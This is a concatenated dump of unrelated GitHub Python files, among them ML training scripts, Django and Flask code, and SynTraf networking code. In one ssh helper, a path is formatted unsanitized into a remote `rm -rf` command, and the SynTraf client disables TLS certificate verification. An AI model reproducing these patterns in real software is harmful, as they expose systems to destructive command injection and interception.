70000\nmax_2=51000\nmin_2=48000\nmax_1=42000\nmin_1=39000\n\n\nnum_5 = 0\nnum_10 = 0\nnum_deruido = 0\nnum_2 = 0\nnum_1=0\n\n\n\nfor region in regions:\n y, x = region.centroid\n area = region.area\n if area >= min_5 and area<= max_5:\n coin_name = '5'\n num_5 += 1\n elif area >= min_10:\n coin_name = '10'\n num_10 += 1\n elif area >= min_2 and area<=max_2:\n coin_name = '2'\n num_2 += 1\n elif area >= min_1 and area<=max_1:\n coin_name = '1'\n num_1 += 1\n else:\n coin_name = ''\n num_deruido += 1\n plt.text(x, y, coin_name, ha='center', va='center') # 
ha, va = horizontal alignment, vertical alignment\n \nvalue = (10*num_10 + 5*num_5 + 2*num_2+1*num_1)\nmonedas=(num_10+num_5+num_2+num_1)\nprint ('%i: 10 pesos, %i: 5 pesos, %i: 2 pesos, %i: 1 peso' %(num_10, num_5, num_2, num_1))\nprint ('You have $%.2f pesos' % value)\nprint('Number of coins: ',monedas)\n\nplt.show()","repo_name":"amilcaralex97/moneda","sub_path":"prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22368488517","text":"from kivymd.uix.dialog import MDInputDialog\r\n\r\nclass SearchPopupMenu(MDInputDialog):\r\n title = 'Add Website URL'\r\n text_button_ok = 'Add'\r\n\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.size = [.9, .3]\r\n self.events_callback = self.callback\r\n\r\n def callback(self, *args):\r\n website_url = self.text_field.text\r\n print(website_url)\r\n","repo_name":"mrtmendoza/python-application-prototype-1","sub_path":"searchpopupmenu.py","file_name":"searchpopupmenu.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10420705568","text":"import datetime\nfrom absl import flags\nimport pytorch_lightning as pl\nimport transformers\nimport torch as th\n#from imblearn.metrics import classification_report_imbalanced\nfrom sklearn.metrics import classification_report\n\n\nflags.DEFINE_integer('batch_size', 16, '')\nflags.DEFINE_float('lr', 1e-5, '')\nflags.DEFINE_float('momentum', .9, '')\nflags.DEFINE_string('model', 'bert-base-uncased', '')\nflags.DEFINE_boolean('multiclass', False, '')\n\nFLAGS = flags.FLAGS\n\nclass BertModel(pl.LightningModule):\n def __init__(self):\n super().__init__()\n self.batch_size = FLAGS.batch_size\n self.counter_epoch = 0\n self.conc = None\n self.tokenizer = transformers.BertTokenizer.from_pretrained(FLAGS.model)\n self.model_type = FLAGS.model\n self.multiclass = FLAGS.multiclass\n self.lr = FLAGS.lr\n if self.multiclass:\n self.model = transformers.BertForSequenceClassification.from_pretrained(FLAGS.model, num_labels=3)\n self.loss = th.nn.BCEWithLogitsLoss(reduction=\"none\")\n else:\n self.model = transformers.BertForSequenceClassification.from_pretrained(FLAGS.model)\n self.loss = th.nn.CrossEntropyLoss(reduction=\"none\")\n\n def forward(self, input_ids):\n mask = (input_ids != 0).float()\n logits = self.model(input_ids, mask).logits\n #for i in range(len(input_ids)):\n # print(self.tokenizer.decode(input_ids[i]))\n # print(logits[i].argmax(-1))\n # print(logits[i])\n return logits\n\n def training_step(self, batch, batch_idx):\n print(self.lr)\n if self.multiclass:\n batch['label'] = batch['label'].type(th.FloatTensor).to(device = 'cuda')\n logits = self.forward(batch['input_ids'])\n loss = self.loss(logits, batch['label']).mean()\n #self.log('training_loss', loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)\n return loss\n\n def validation_step(self, batch, batch_idx):\n y = batch['label']\n if self.multiclass:\n batch['label'] = batch['label'].type(th.FloatTensor).to(device = 'cuda')\n logits = self.forward(batch['input_ids'])\n loss = self.loss(logits,batch['label'])\n preds = logits.argmax(-1)\n return {'loss': loss, 'pred': preds, 'target': y}\n\n def validation_epoch_end(self, outputs):\n loss = th.cat([o['loss'] for o in outputs], 0).mean()\n preds = th.cat([o['pred'] for o in outputs], 0)\n print(preds)\n targets = th.cat([o['target'] for o in outputs], 0)\n 
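# note: preds/targets are flattened across all validation batches before scoring\n 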
print(targets)\n if self.multiclass:\n targets = targets.argmax(-1)\n report = classification_report(targets.cpu(), preds.cpu())\n print(report)\n print(loss)\n with open('./Ergebnisse/%s/training/%s_epoch_no_%s.txt' % (\n FLAGS.concept, datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"), self.counter_epoch),\n 'w') as outfile:\n outfile.write(str(report))\n report = classification_report(targets.cpu(), preds.cpu(), output_dict=True)\n self.counter_epoch += 1\n self.log = {'val_loss': loss}\n return self.log\n\n def test_step(self, batch, batch_idx):\n\n if self.multiclass:\n logits = self.forward(batch['input_ids'])\n pred_negative = sum(logits.argmax(-1) == 0)\n pred_neutral = sum(logits.argmax(-1) == 1)\n pred_positive = sum(logits.argmax(-1) == 2)\n return {'pred_negative': pred_negative, 'pred_neutral': pred_neutral, 'pred_positive': pred_positive, 'logits': logits}\n else:\n logits = self.forward(batch['input_ids'])\n pred = sum(logits.argmax(-1) == 1)\n print(pred)\n return {'logits': logits, 'pred': pred}\n\n def test_epoch_end(self, outputs):\n print(outputs)\n if self.multiclass:\n logits = [o['logits'] for o in outputs]\n conc = logits[0]\n for logit in logits[1:]:\n conc= th.cat((conc,logit), 0)\n self.conc = conc\n predictions = {}\n pred_negative = [o['pred_negative'] for o in outputs]\n print(pred_negative)\n pred_negative = th.sum(th.stack(pred_negative))\n print(pred_negative)\n predictions['negative'] = pred_negative\n pred_neutral = [o['pred_neutral'] for o in outputs]\n pred_neutral = th.sum(th.stack(pred_neutral))\n predictions['neutral'] = pred_neutral\n pred_positive = [o['pred_positive'] for o in outputs]\n pred_positive = th.sum(th.stack(pred_positive))\n predictions['positive'] = pred_positive\n highest_prediction = max(predictions, key=predictions.get)\n self.log = {'test_pred': highest_prediction}\n return self.log\n else:\n logits = [o['logits'] for o in outputs]\n pred = [o['pred'] for o in outputs]\n conc = logits[0]\n for logit in logits[1:]:\n conc= th.cat((conc,logit), 0)\n pred = th.sum(th.stack(pred)) \n pred = pred / len(self.ds_test)\n self.log = {'test_pred': pred}\n self.conc = conc\n return self.log\n\n\n\n def train_dataloader(self):\n return th.utils.data.DataLoader(\n self.ds_train,\n batch_size=self.batch_size,\n drop_last=True,\n shuffle=True,\n num_workers=4\n )\n\n def val_dataloader(self):\n return th.utils.data.DataLoader(\n self.ds_val,\n batch_size=self.batch_size,\n drop_last=False,\n shuffle=False,\n num_workers=4\n )\n\n def test_dataloader(self):\n return th.utils.data.DataLoader(\n self.ds_test,\n batch_size=self.batch_size,\n drop_last=False,\n shuffle=False,\n num_workers=4\n )\n\n def configure_optimizers(self):\n print(self.lr)\n return th.optim.Adam(\n self.parameters(),\n lr=(self.lr or self.learning_rate)\n )","repo_name":"porzelaines/Masterarbeit","sub_path":"Masterarbeit/BertModel.py","file_name":"BertModel.py","file_ext":"py","file_size_in_byte":6241,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"13992237320","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\n\n\ndef task1(df):\n \"\"\"\n Apply operations specified in question 1.\n\n Parameters:\n df (Dataframe):The dataframe which is to be applied operations\n\n Returns:\n The dataframe after applying operations\"\"\"\n\n # get all sentiments\n 
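# (sentiment labels, e.g. 'Positive' or 'Extremely Positive', depending on the dataset)\n 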
sentiments_column = df['Sentiment']\n # get unique sentiment values\n possible_sentiments = set(sentiments_column)\n print('all possible sentiment values: ' + str(possible_sentiments))\n\n # get values and number of occurrences of a given value, then sort it and\n # get second most occurring one\n second_most_popular_sent = sentiments_column.value_counts() \\\n .sort_values(ascending=False).index[1]\n print('second most popular sentiment: ' + str(second_most_popular_sent))\n\n # filter df to retrieve samples with Extremely Positive sentiment only\n df_extremely_positive = df[df['Sentiment'] == 'Extremely Positive']\n # group by date, sort it and retrieve the most popular one\n date_with_most_extremely_positive_sent = df_extremely_positive \\\n .groupby(['TweetAt']).count().sort_values(\n ascending=False, by=['Sentiment']).index[0]\n print('date with most extremely positive sentiment: '\n + str(date_with_most_extremely_positive_sent))\n\n # convert to lower case\n df['OriginalTweet'] = df['OriginalTweet'].str.lower()\n\n # replace non alphabetical characters\n df['OriginalTweet'] = df['OriginalTweet'] \\\n .replace('[^0-9a-zA-Z]+', ' ', regex=True)\n\n # ensure that the words of a message are separated by a single whitespace\n df['OriginalTweet'] = df['OriginalTweet'].replace(' {2,}', ' ', regex=True)\n\n return df\n\n\ndef count_occurrences(dict, words):\n \"\"\"\n Counts number of occurrences of words.\n\n Parameters: dict (dict): The dict which is used to store information about\n occurrences of a given word. Each word is added to this dict as a key,\n where the value corresponds to the number of occurrences\n words (Iterable): collection of words to count\n \"\"\"\n\n for word in words:\n if word in dict:\n dict[word] = dict[word] + 1\n else:\n dict[word] = 1\n\n\ndef task2(df):\n \"\"\"\n Apply operations specified in question 2\n\n Parameters:\n df (Dataframe):The dataframe which is to be applied operations\n\n Returns:\n Dataframe after applying operations and dict with most frequent words\n \"\"\"\n\n # add TokenizedTweets column and insert split words\n df.insert(5, 'TokenizedTweets', df['OriginalTweet'].str.split())\n\n # count total number of words with repetitions\n total_words_count = df['TokenizedTweets'].str.len().sum()\n print('total number of words: ' + str(total_words_count))\n\n # number of all distinct words\n unique_words = set()\n df['TokenizedTweets'].apply(\n lambda x: [unique_words.add(word) for word in x])\n print('number of unique words: ' + str(len(unique_words)))\n\n # the 10 most frequent words in the corpus\n n_most_frequent_words(df, 10)\n\n stop_words = set(open('./data/text_data/stopwords.txt').read().splitlines())\n\n # remove stopwords or words with ≤ 2 characters\n df['TokenizedTweets'] = df['TokenizedTweets'].apply(\n lambda x: [word for word in x if\n len(word) > 2 and word not in stop_words])\n\n total_words_count = df['TokenizedTweets'].str.len().sum()\n print('total number of words after removing stop words: ' + str(\n total_words_count))\n\n # the 10 most frequent words in the corpus\n dict_most_frequent_words = n_most_frequent_words(df, 10)\n\n return df, dict_most_frequent_words\n\n\ndef n_most_frequent_words(df, n):\n \"\"\"\n Calculate words frequency\n\n Parameters: df (Dataframe): The dataframe with column TokenizedTweets for\n which counting is applied n (int): Number of most frequent words to be\n printed. For example n=10 will result in printing results for 10 most\n frequent words. 
This is, however, independent of the dict that is returned,\n which is not limited by this parameter.\n\n Returns:\n dictionary of words frequency\n \"\"\"\n words_freq_dict = {}\n np.vectorize(count_occurrences)(words_freq_dict, df['TokenizedTweets'])\n\n most_frequent_words = sorted(words_freq_dict.items(), key=lambda x: x[1]\n , reverse=True)\n print('the 10 most frequent words: ' + str(most_frequent_words[0:n]))\n\n return words_freq_dict\n\n\ndef task3(words_frequencies_dict, df_size):\n \"\"\"\n Create line chart of words frequency and saves it to file\n\n Parameters: df_size (int): size of the dataframe. Equivalent to the number of\n documents in the dataset for which we plot the chart.\n words_frequencies_dict (dict): dictionary of word frequencies\n\n Returns:\n None\n \"\"\"\n # create new dict to obtain fraction of documents in which a word appears\n words_fraction_appearing = {k: v / df_size for (k, v) in\n words_frequencies_dict.items()}\n\n # plot chart after sorting\n plt.plot(sorted(words_fraction_appearing.values(), key=lambda x: x,\n reverse=False))\n # save image to file\n plt.savefig('outputs/most_frequent.jpg')\n\n\ndef task4(df):\n \"\"\"\n Create a MultinomialNB that is trained on the dataframe and print its error rate.\n\n Parameters: df (Dataframe): The dataframe used to train the model. Needs to\n have a column 'OriginalTweet' that is used as sample data and a 'Sentiment'\n column which contains the target value\n\n Returns:\n None\n \"\"\"\n # create count vectorizer\n cv = CountVectorizer()\n\n # transform data using the count vectorizer\n X = cv.fit_transform(np.array(df['OriginalTweet']))\n # transform target data to numpy array\n y = np.array(df['Sentiment'])\n\n # create MultinomialNB\n clf = MultinomialNB()\n # train the model\n clf.fit(X, y)\n\n print('error rate: ' + str(1 - clf.score(X, y)))\n\n\nif __name__ == '__main__':\n time_total = time.time()\n\n # load the data to dataframe\n df = pd.read_csv('data/text_data/Corona_NLP_train.csv', encoding='latin-1')\n\n # task 1\n df_converted = task1(df)\n\n # task 2\n df_tokenized, dict_most_frequent_words = task2(df_converted)\n\n # # task 3\n task3(dict_most_frequent_words, len(df_tokenized))\n\n # # task 4\n task4(df_tokenized)\n\n print(\"---code executed in %s seconds ---\" % (time.time() - time_total))\n","repo_name":"Drakles/data_mining_cw2","sub_path":"text_mining.py","file_name":"text_mining.py","file_ext":"py","file_size_in_byte":6570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30398297154","text":"import ares\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nc_f=np.arange(0.1, 1, 0.1)\r\nfig1 = plt.figure()\r\nfor i in range(len(c_f)):\r\n sim = ares.simulations.Global21cm(clumping_factor = c_f[i])\r\n sim.run()\r\n plt.plot(sim.history['z'], sim.history['dTb'], label = \"CF= \"+str(round(c_f[i],1)))\r\n\r\nplt.title(r\"clumping_factor\")\r\nplt.xlabel(r\"$z$\")\r\nplt.ylabel(r\"$\\delta T_b$\")\r\nplt.legend(loc='lower right')\r\nplt.xlim(5,35)\r\nplt.savefig(\"clumping_factor.png\")","repo_name":"aryana-haghjoo/My-Project","sub_path":"code_history/ares_scripts/sample/clumping_factor.py","file_name":"clumping_factor.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70434808082","text":"from pathlib import PurePath\n\nfrom client.utils.osutils import ssh\n\n\ndef find_dumps(tv_ip):\n find_files = r\"find /mnt/ -name '*.core'\"\n\n try:\n client = ssh.ssh_connect(tv_ip)\n 
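# exec_command returns an (stdin, stdout, stderr) triple; only stdout is used here\n 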
files, _ = client.exec_command(find_files, timeout=10)\n except:\n raise\n else:\n files = files.read().decode()\n finally:\n client.close()\n\n return files.split()\n\n\ndef clear_dumps(tv_ip, path):\n if isinstance(path, PurePath):\n path = path.as_posix()\n\n cmd = r\"rm -rf {}\".format(path)\n\n try:\n client = ssh.ssh_connect(tv_ip)\n _, stdout, _ = client.exec_command(cmd, timeout=10)\n except:\n raise\n else:\n stdout = stdout.read().decode()\n finally:\n client.close()\n\n return stdout\n\n\ndef get_dumps(tv_ip, remote_path_file, local_path_file):\n if isinstance(remote_path_file, PurePath):\n remote_path_file = remote_path_file.as_posix()\n if isinstance(local_path_file, PurePath):\n local_path_file = local_path_file.as_posix()\n\n try:\n ssh.get_file(tv_ip, remote_path_file, local_path_file)\n except:\n raise\n","repo_name":"papachappa/client","sub_path":"client/utils/tv/nonsoap_commands/dumps.py","file_name":"dumps.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19808227212","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\n\nmy_data = pd.read_csv('word2vec.txt', sep=',')\n\nX = my_data.iloc[:,0:].values\nmin_max_scaler = preprocessing.MinMaxScaler()\nx_scaled = min_max_scaler.fit_transform(X)\ndf_normalized = pd.DataFrame(x_scaled)\n\ndf_normalized.to_csv('dataset.txt', header=None, index=None, sep=',', mode='a')\n\n\n\nTraining_X = df_normalized.iloc[0:5221,:].values\nTesting_X = df_normalized.iloc[5281:5331,:].values\nTraining_Y = df_normalized.iloc[5331:10611,:].values\nTesting_Y = df_normalized.iloc[10611:10662,:].values\n\n\ndf1=pd.DataFrame(data=Training_X)\ndf2=pd.DataFrame(data=Testing_X)\ndf3=pd.DataFrame(data=Training_Y)\ndf4=pd.DataFrame(data=Testing_Y)\n\nframes = [df1, df3]\nTraining = pd.concat(frames)\n\nprint(Training.shape)\n\nframes1 = [df2, df4]\nTesting = pd.concat(frames1)\nprint(Testing.shape)\n\n\nTraining.to_csv('Training.txt', header=None, index=None, sep=',', mode='a')\nTesting.to_csv('Testing.txt', header=None, index=None, sep=',', mode='a')\n\n\n\n\n\n\n\n\n","repo_name":"bsavanth/Sentiment-Analysis","sub_path":"Splitting.py","file_name":"Splitting.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"8073882239","text":"#from persist import store, retrieve, bring\nfrom datetime import datetime\n\n\"\"\"\ntake_quiz - provides a module which implements the functions to access\nquiz and quiz attempts by a Student, and the answers to the questions\nthat they provide. 
Works in conjunction with quizzes built from questions\ncreated by a professor, and with a grading module that checks for correct\nanswers.\n\"\"\"\n\nclass Answers():\n \"\"\"\n Provides object with attributes containing information for quiz and answers\n\n attributes:\n ansAttempts - list of lists\n attemptSubmitted - list\n stuID - string\n profID - string\n quizID - string\n quiz - Quiz object\n currentAttempt - int\n \"\"\"\n def __init__(self, stuID, profID, quizID):\n self.ansAttempts = []\n self.attemptSubmitted = []\n self.stuID = stuID\n self.profID = profID\n self.quizID = quizID\n self.currentAttempt = None\n","repo_name":"divaad/Comp-2005","sub_path":"take_quiz.py","file_name":"take_quiz.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22850985673","text":"from django.contrib.auth.models import User\nfrom django import forms\nfrom mainapp.models import AvailableJob, Profile,AvailableWorker\nfrom .models import Mail,UserAdress\n\nclass UserUpdateForm(forms.ModelForm):\n email = forms.EmailField()\n class Meta:\n model = User\n fields = ['username','email','first_name','last_name'] \n def __init__(self, *args, **kwargs):\n super(UserUpdateForm, self).__init__(*args,**kwargs)\n for fieldname in ['username','email','first_name', 'last_name']:\n self.fields[fieldname].help_text = None\n\nclass ProfileForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['photo','phone']\n def __init__(self, *args, **kwargs):\n super(ProfileForm, self).__init__(*args,**kwargs)\n for fieldname in ['photo','phone']:\n self.fields[fieldname].help_text = None\n\nclass WorkerForm(forms.ModelForm):\n class Meta:\n model = AvailableWorker\n fields = ['phone','id_card','id_number','local_govt','state','country','description']\n def __init__(self, *args, **kwargs):\n super(WorkerForm, self).__init__(*args,**kwargs)\n for fieldname in ['phone','id_card','id_number','local_govt','state','country','description']:\n self.fields[fieldname].help_text = None\n\n\nclass JobForm(forms.ModelForm):\n class Meta:\n model = AvailableJob\n fields = ['type_of_work','local_govt','state','country','description','number_of_workers','cost']\n def __init__(self, *args, **kwargs):\n super(JobForm, self).__init__(*args,**kwargs)\n for fieldname in ['type_of_work','local_govt','state','country','description','number_of_workers','cost']:\n self.fields[fieldname].help_text = None\n \n\n\nclass MailForm(forms.ModelForm):\n class Meta:\n model = Mail\n fields = ['your_name','email_address','phone_number','how_can_we_help_you']\n def __init__(self, *args, **kwargs):\n super(MailForm, self).__init__(*args,**kwargs)\n for fieldname in ['your_name','email_address','phone_number','how_can_we_help_you']:\n self.fields[fieldname].help_text = None\n\n\nclass UserAdressForm(forms.ModelForm):\n class Meta:\n model = UserAdress\n fields = ['detail_address']\n ","repo_name":"Imotechs/greenlandz","sub_path":"users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22037774624","text":"#Chapter-end exercise 5.7\n#AtCoder Educational DP Contest F LCS\n\ns=input()\nt=input()\ndp=[[0]*(len(t)+1) for _ in range(len(s)+1)]\n\nfor i in range(len(s)):\n for j in range(len(t)):\n if s[i]==t[j]:\n dp[i+1][j+1]=dp[i][j]+1\n else:\n dp[i+1][j+1]=max(dp[i][j+1],dp[i+1][j])\n\nAns=\"\"\nsl,tl=len(s),len(t)\nwhile len(Ans)<dp[-1][-1]:\n if s[sl-1]==t[tl-1]:\n Ans+=s[sl-1]\n sl-=1\n tl-=1\n elif sl>1 and 
dp[sl-1][tl]==dp[sl][tl]:\n sl-=1\n else: tl-=1\n\nprint(Ans[::-1])","repo_name":"mathandsoon/-_python","sub_path":"drken_book/Chapter5/Exercise/5_7.py","file_name":"5_7.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40734745887","text":"import sys\nimport colorama\nimport configparser\nfrom pygame import mixer\n\nconfig = configparser.ConfigParser()\nconfig.read(r'typetrainer\\settings.ini')\ntry:\n from typetrainer import game, multiplayer_menu, socket_client, text_tools,\\\n texts_generator, menu\nexcept Exception as e:\n print('Game modules not found: \"{}\"'.format(e), file=sys.stderr)\n exit(config['ERR_CODES']['ERROR_MISSING_MODULE'])\n\n\ndef main():\n if len(sys.argv) > 1:\n parse_args(sys.argv[1])\n colorama.init()\n mixer.pre_init(44100, -16, 1, 512)\n mixer.init()\n mixer.Sound.play(mixer.Sound('typetrainer/hello.wav'))\n menu.main_menu()\n\n\ndef parse_args(arg: str):\n if arg == '-h' or arg == '--help':\n menu.show_help()\n menu.exit_game()\n else:\n raise KeyError('Incorrect argument', arg)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jaz7Mutant/Typing-Trainer","sub_path":"TypingTrainer.py","file_name":"TypingTrainer.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"24721119400","text":"\"\"\"\napp.py\n -exposes 2 APIs for food dictionary and food record resources\n\"\"\"\n\nfrom flask import Flask\nfrom flask_restful import Api\n\nfrom foodlog.resources.food_record_api import FoodRecordAPI\n#from foodlog.resources.food_dict_api import FoodDictAPI\n\n# instanciate a flask_restful RESTful API app\nAPP = Flask(__name__)\nAPI = Api(APP)\n\n# add resources w/ associated url routes and endpoints\n\nAPI.add_resource(FoodRecordAPI,\n '/foodlog/food-dict/',\n endpoint='food_rec')\n\n#API.add_resource(FoodDictAPI,\n# '/foodlog/food-dict/',\n# endpoint='food_dict')\n\n\n# run the web service in debug mode if this script is executed manually\nif __name__ == '__main__':\n APP.run(debug=True)\n","repo_name":"oostin623/FoodLog","sub_path":"foodlog/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6507535661","text":"# SYNTRAF GLOBAL IMPORT\nimport lib.st_process_and_thread\nfrom lib.st_crypto import *\nfrom lib.st_struct import cl_ifreq\nfrom lib.st_process_and_thread import *\nfrom lib.st_read_toml import read_conf\nfrom lib.st_conf_validation import valid_dir_rsa_keypair, validate_ipv4\nfrom lib.st_obj_cc_client import cc_client\n\nfrom tabulate import tabulate\n# SYNTRAF SERVER IMPORT\nif not CompilationOptions.client_only:\n # from gevent import monkey\n # monkey.patch_all()\n # from gevent import socket\n import socket\n # from gevent.server import StreamServer\n from gevent.pool import Pool\n from lib.st_influxdb import * # import ssl after monkey patch because of urllib3\n\nfrom lib.st_conf_validation import generate_client_config_mesh\n\n# BUILTIN IMPORT\nfrom socketserver import TCPServer, ThreadingMixIn, StreamRequestHandler\nimport logging\nimport sys\nimport time\nimport threading\nimport json\nfrom json import JSONEncoder\nimport select\nfrom lib import st_struct\nimport platform\nimport traceback\nimport pathlib\nimport os\nimport inspect\nimport os.path\nimport re\nimport struct\nfrom datetime import datetime\nfrom copy import 
copy, deepcopy\nfrom ctypes import *\n\n# PACKAGE IMPORT\nimport ssl # import ssl after monkey patch\nimport json\nimport pytz\nfrom cpuinfo import get_cpu_info\nimport psutil\n\nserver_log = logging.getLogger(\"syntraf.\" + \"lib.st_server\")\nclient_log = logging.getLogger(\"syntraf.\" + \"lib.st_client\")\n\n\n\n\n\n#################################################################################\n### SOCKET RCV\n#################################################################################\ndef sock_rcv(sckt):\n try:\n # Waiting for a size header (a big-endian long packed into 4 bytes)\n size = sckt.recv(4)\n if not size: return None\n\n # Unpacking the 4 bytes to get the size\n # https://docs.python.org/3/library/struct.html\n size_decoded = struct.unpack(\">l\", size)[0]\n\n bytes_left = size_decoded\n data = b''\n while bytes_left >= 1:\n data = data + sckt.recv(bytes_left)\n bytes_left = size_decoded - len(data)\n\n result = json.loads(data)\n return result\n\n except Exception as exc:\n raise exc\n\n\n#################################################################################\n### SOCKET SENDALL\n#################################################################################\ndef sock_send(sckt, payload, command):\n try:\n encoded_payload = json.dumps({'COMMAND': command, 'PAYLOAD': payload}, ensure_ascii=False, default=str).encode(\n \"utf-8\")\n data_size = struct.pack(\">l\", len(encoded_payload))\n\n sckt.sendall(data_size)\n sckt.sendall(encoded_payload)\n return True\n\n except Exception as exc:\n raise exc\n\n\ndef get_system_infos():\n uname = platform.uname()\n python_version = platform.python_version()\n cpu_infos = get_cpu_info()\n cpu_brand = cpu_infos['brand_raw']\n cpu_frequency = cpu_infos['hz_advertised_friendly']\n cpu_count_logical = psutil.cpu_count(logical=True)\n cpu_count_physical = psutil.cpu_count(logical=False)\n memory_mb_physical = round(psutil.virtual_memory().total / 1024 / 1024)\n boot_time = datetime.fromtimestamp(psutil.boot_time()).strftime(\"%Y-%m-%d %H:%M:%S\")\n system_infos = {'SYSTEM': uname.system, 'NODE_NAME': uname.node, 'RELEASE': uname.release, 'VERSION': uname.version,\n 'PROCESSOR': uname.processor, 'PYTHON_VERSION': python_version, 'CPU_LOGICAL': cpu_count_logical,\n 'CPU_PHYSICAL': cpu_count_physical, 'MEMORY_MB': memory_mb_physical, 'BOOT_TIME': boot_time,\n 'CPU_FREQUENCY': cpu_frequency, 'CPU_MODEL': cpu_brand, 'TIMEZONE': DefaultValues.TIMEZONE}\n return system_infos\n\n\ndef client_sck_init(_config):\n ssl_conn = None\n try:\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n set_tcp_ka(s, client_log)\n\n context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n\n # Do not validate that the certificate hostname matches\n context.check_hostname = False\n\n # Do not require a valid server certificate\n context.verify_mode = ssl.CERT_NONE\n\n # Wrapping the socket\n ssl_conn = context.wrap_socket(s, server_side=False, do_handshake_on_connect=True)\n\n client_log.info(f\"TRYING TO CONNECT TO : {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']}\")\n\n valid_ip = False\n while not valid_ip:\n try:\n server_ip_addr = socket.gethostbyname(_config['CLIENT']['SERVER'])\n if validate_ipv4(server_ip_addr):\n valid_ip = True\n except socket.gaierror as e:\n if e.errno == socket.EAI_AGAIN:\n logging.error(f\"TEMPORARY FAILURE IN NAME RESOLUTION OF {_config['CLIENT']['SERVER']}\")\n time.sleep(1)\n\n # CONNECT\n ssl_conn.connect((server_ip_addr, int(_config['CLIENT']['SERVER_PORT'])))\n\n if server_ip_addr != 
_config['CLIENT']['SERVER']:\n client_log.info(f\"CONNECTED TO : {_config['CLIENT']['SERVER']}({server_ip_addr}):{_config['CLIENT']['SERVER_PORT']}\")\n else:\n client_log.info(f\"CONNECTED TO : {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']}\")\n\n except (ConnectionRefusedError, ConnectionResetError) as exc:\n client_log.error(\n f\"ERROR CONNECTING TO {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']} : CONNECTION REFUSED\")\n sys.exit()\n except OSError as exc:\n # Network is unreachable\n if exc.errno == 101:\n client_log.error(\n f\"ERROR CONNECTING TO {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']} : NETWORK UNREACHABLE\")\n sys.exit()\n except Exception as exc:\n client_log.error(f\"client:{type(exc).__name__}:{exc}\", exc_info=True)\n sys.exit()\n\n if ssl_conn is None:\n sys.exit()\n else:\n return ssl_conn\n\n\ndef client_connect_utime(_config):\n try:\n dt = datetime.now()\n timezone = pytz.timezone(DefaultValues.TIMEZONE)\n dt_tz = timezone.localize(dt)\n client_utime = dt_tz.astimezone(pytz.timezone(\"UTC\")).timestamp()\n return client_utime\n except Exception as exc:\n raise exc\n\n\ndef client_detect_type_if():\n pass\n # ifreq = struct.pack('16sh', 'wlan0', 0)\n # flags = struct.unpack('16sh', fcntl.ioctl(sockfd, SIOCGIFFLAGS, ifreq))[1]\n # ifreq.ifr_name = c_char_p(\"wlp4s0\".encode('utf-8'))\n # \"wlp4s0\".encode('utf-8')\n # ifreq.ifr_name = create_string_buffer(b\"wlp4s0\", IFNAMSIZ)\n\n # ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # IFNAMSIZ = 16\n # SIOCGIWNAME = 0x8B01\n # ifreq = st_struct.cl_ifreq()\n #\n # ifreq.ifr_name = b\"wlp4s0\"\n # ifreq.ifr_slave = b\"wlp4s0\"\n # print(b\"wlp4s0\".hex())\n #\n # if sys.platform == \"linux\":\n # try:\n # info = fcntl.ioctl(ss, SIOCGIWNAME, ifreq)\n # print(info)\n # print(\"wireless\")\n # except Exception as exc:\n # print(exc)\n # print(\"not wireless\")\n\n\ndef client_send_auth(_config, client_utime, ssl_conn):\n try:\n # Sending TOKEN and UID for authentication, timestamp and version\n client_log.debug(f\"SENDING GREETING PAYLOAD TO SERVER\")\n payload_greetings = {'TOKEN': _config['CLIENT']['TOKEN'], 'CLIENT_UID': _config['CLIENT']['CLIENT_UID'],\n 'TIMESTAMP': client_utime, 'SYNTRAF_CLIENT_VERSION': DefaultValues.SYNTRAF_VERSION,\n 'PUBLIC_KEY': _config['CLIENT']['PUBLIC_KEY']}\n\n sock_send(ssl_conn, payload_greetings, \"AUTH\")\n received_data = sock_rcv(ssl_conn)\n\n if not received_data is None:\n if received_data['COMMAND'] == \"AUTH_FAILED\":\n client_log.info(f\"AUTHENTICATION FAILED, REASON GIVEN BY SERVER : {received_data['PAYLOAD']}\")\n return False\n 